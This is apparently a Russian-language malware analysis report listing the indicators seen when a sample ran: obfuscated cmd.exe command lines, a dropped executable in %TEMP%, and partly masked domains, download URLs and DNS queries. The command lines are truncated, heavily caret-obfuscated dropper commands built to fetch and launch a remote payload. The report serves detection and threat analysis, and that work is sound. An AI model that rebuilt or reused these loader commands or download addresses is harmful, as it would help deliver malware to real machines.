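Техническая информация
Ниже перечислены командные строки процессов, пути к файлам, сетевые соединения (узел:порт), URL-адреса HTTP и DNS-запросы. Часть символов в доменных именах заменена знаком «#», а длинные командные строки обрезаны («...»), поэтому эти значения приведены не полностью и не годятся для точного сопоставления с журналами без полного исходного значения.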
- '<SYSTEM32>\cmd.exe' /c F^oR , ; /^f ; " delims=nZa4FH tokens= +2 " ; %n ; ; ^IN , ( , ; ' , , ^^f^^TYpe ; , ^| ; ^^Find , "mdFi" ; ; ' , ; ) ; ; DO ; %n; ; 47/V;H^+}@o8u2E ^ , , W0b/%TmP:~ -8, 1%...
- %TEMP%\370.exe
- %TEMP%\370.exe
- 'jo##lan.com':80
- 'bo##i.top':80
- 'la###de.com.tr':80
- 'ds###ttoo.com':80
- 'ds###ttoo.com':443
- 'st####ctory-era.ru':80
- 'st####ctory-era.ru':443
- http://www.jo##lan.com/CZqjcM/
- http://www.jo##lan.com/cgi-sys/suspendedpage.cgi
- http://www.bo##i.top/uH7oau/
- http://ds###ttoo.com/XUyfw4Sn/
- http://www.st####ctory-era.ru/cdXijR3Z/
- 'ds###ttoo.com':443
- 'st####ctory-era.ru':443
- DNS ASK jo##lan.com
- DNS ASK bo##i.top
- DNS ASK la###de.com.tr
- DNS ASK ds###ttoo.com
- DNS ASK st####ctory-era.ru
- '<SYSTEM32>\cmd.exe' /c F^oR , ; /^f ; " delims=nZa4FH tokens= +2 " ; %n ; ; ^IN , ( , ; ' , , ^^f^^TYpe ; , ^| ; ^^Find , "mdFi" ; ; ' , ; ) ; ; DO ; %n; ; 47/V;H^+}@o8u2E ^ , , W0b/%TmP:~ -8, 1%...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ^f^TYpe | ^Find "mdFi"
- '<SYSTEM32>\cmd.exe' /S /D /c" fTYpe "
- '<SYSTEM32>\find.exe' "mdFi"
- '<SYSTEM32>\cmd.exe' ; ; 47/V;H+}@o8u2E , , W0b/c " ; , (^SeT ] ^ ^ =Do^XsbB}0^+tMl4^)W$^ x';7^(ZF2A\mL/kJh:^cNRrCHn@{ed^P^uyvfizS.^=3^w^apj,U-^qE)&& , f^or ; , %^X ; ^In ; ; ( ;5^8 ; ;^ +1 56 4^3 , ^+37...